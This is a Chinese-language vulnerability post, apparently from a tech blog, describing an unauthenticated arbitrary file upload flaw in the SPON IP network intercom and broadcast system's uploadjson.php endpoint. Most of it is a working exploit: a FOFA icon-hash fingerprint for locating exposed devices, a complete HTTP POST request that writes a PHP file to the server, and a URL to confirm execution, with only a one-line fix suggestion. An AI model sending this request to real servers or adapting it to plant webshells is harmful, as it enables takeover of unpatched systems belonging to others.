世邦IP网络对讲广播系统 uploadjson.php接口处存在任意文件上传漏洞

产品简介

SPON世邦IP网络对讲广播系统是一种先进的通信解决方案,旨在提供高效的网络对讲和广播功能。

漏洞概述

SPON世邦IP网络对讲广播系统 uploadjson.php接口处存在任意文件上传漏洞,未经身份验证的攻击者可利用此漏洞上传恶意后门文件,可导致服务器失陷。

指纹识别

fofa:

python 复制代码
icon_hash="-1830859634"

漏洞利用

poc

python 复制代码
POST /php/uploadjson.php HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
 
jsondata[filename]=2.php&jsondata[data]=<?php echo md5('123456');?>

验证url:

python 复制代码
http://your_ip/lan/2.php

修复建议

联系软件厂商更新至最新安全版本

相关推荐
LuDvei7 分钟前
linux TCP/UDP
linux·tcp/ip·udp
王燕龙(大卫)16 分钟前
通过文心快码,2小时完成一周的工作量
服务器·网络·tcp/ip
yuyuzururu18 分钟前
计算机网络实验作业-IP分组分片和ARP实验
网络·tcp/ip·计算机网络
生活很暖很治愈26 分钟前
Linux——TCP通信
linux·运维·tcp/ip
wWYy.26 分钟前
详解socket网络编程
网络
开开心心就好34 分钟前
小巧绿色免费关机工具,支持定时倒计时
linux·运维·服务器·安全·powerpoint·1024程序员节·foxmail
两个人的幸福online1 小时前
php开发者 需要 协程吗
android·开发语言·php
Du_chong_huan1 小时前
3.4 路由器的附加功能
网络·计算机网络·智能路由器
Xi-Xu1 小时前
在云服务器上安全运行 OpenClaw:从安装到加固的完整指南
运维·服务器·人工智能·安全
广州智维科技1 小时前
CAN总线数据记录仪选型指南Kvaser Memorator Pro 2xHS v2
网络